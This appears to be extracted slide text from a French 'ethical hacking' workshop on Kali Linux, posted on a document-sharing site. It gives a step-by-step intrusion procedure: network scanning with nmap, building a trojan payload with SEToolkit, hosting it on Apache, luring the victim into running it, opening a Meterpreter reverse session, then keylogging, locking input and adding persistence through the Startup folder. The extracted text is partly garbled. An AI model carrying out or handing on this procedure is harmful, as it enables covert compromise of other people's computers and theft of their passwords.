Atelier kali ATELIER APTECH PIRATAGE ÉTHIQUE LES ÉTAPES DU HACKING Collecte des informations Analyse du réseau Planifier l ? attaque Maintenir la connexion Effacer les traces Outils de Hacking Kali Ouvrir le terminal Kali Taper Sudo su Entrer le mot de pa
ATELIER APTECH PIRATAGE ÉTHIQUE LES ÉTAPES DU HACKING Collecte des informations Analyse du réseau Planifier l ? attaque Maintenir la connexion Effacer les traces Outils de Hacking Kali Ouvrir le terminal Kali Taper Sudo su Entrer le mot de passe Taper netdiscover Taper nmap -Pn-v-A Ip address Voir les ports opened Voir le Smb os Discovery Taper Setoolkit ? pour initier un certain nombre d ? attaques Confirmer avec y ? Ensuite créer un cheval de Troie pour ouvrir un port d ? accès sur la machine cible Sélectionner Sélectionner Ensuite sélectionner LHOST c ? est l ? adresse de l ? attaquant La machine qui attaque Clique droit dans le terminal avec Split vertically Sur la nouvelle fenêtre de commande taper ifconfig ? pour trouver l ? adresse de l ? attaquant L ? introduire dans le Ip adress for the payload listener Introduire un numéro de port L ? importance de network scanning pour voir les ports Entrer Lancer Yes Copier le path sur payload has been exported ? La partie la plus compliquée est de faire exécuter le module par le client Il faut savoir séduire la cible à ouvrir le lien Il faut renommer le fichier créer pour qu ? il devienne attirant Réduire la fenêtre de l ? invite de commande Clique droit open as root Mot de passe Filesystem root Ouvrir le dossier root ? Ouvrir le dossier set ? Renommer payload exe Retour dans filesystem root ? Aller dans var www HTML Coller dans HTML Démarrer le service o? la cible va ouvrir Exécuter en tant que root sudo su ? Taper dans la seconde fenêtre service apache start ? Verifier avec service apache status Vérifier le active running ? Lancer le navigateur sur la cible et taper l ? adresse IP Kali Suivi de l ? adresse du fichier payload exe ? Le fichier payload exe est téléchargé Exécuter le fichier Mettez côte à côte les fenêtres pour voir les t? ches sur les deux systèmes Une session s ? ouvre sur Kali Meterpreter session opened l ? adresse ip LHOST et celle de la cible avec les ports ouverts Entrer sur l ? attaquant et dans la commande sessions -i ? Dans le Meterpreter ouvert interagir avec la cible Dans la commande Meterpreter taper ce que l ? on veut Exemples keyscan star lire les mots de passe Puis keyscan dump pour voir les différentes données Bloquer la souris uictl disable enable mouse keyboard Redémarrer le client reboot Pour mettre en place la persistance il faut mettre le payload dans le dossier de démarrage sur le client taper shell startup ? après Windows R Copier payload dans le dossier ouvert startup Chiffrer le message envoyé intercepté Dans Kali taper nano msg ? L ? interface nano msg s ? ouvre Dans le fenêtre écrire coordonnées bancaires nom Justin mot de passe bahatidirokpa ? Control O Control X cut msg ? Pour crypter openssl -enc -aes- -cbc -base -in msg -out chiffre
Documents similaires










-
29
-
0
-
0
Licence et utilisation
Gratuit pour un usage personnel Aucune attribution requise- Détails
- Publié le Jan 02, 2023
- Catégorie Administration
- Langue French
- Taille du fichier 31.2kB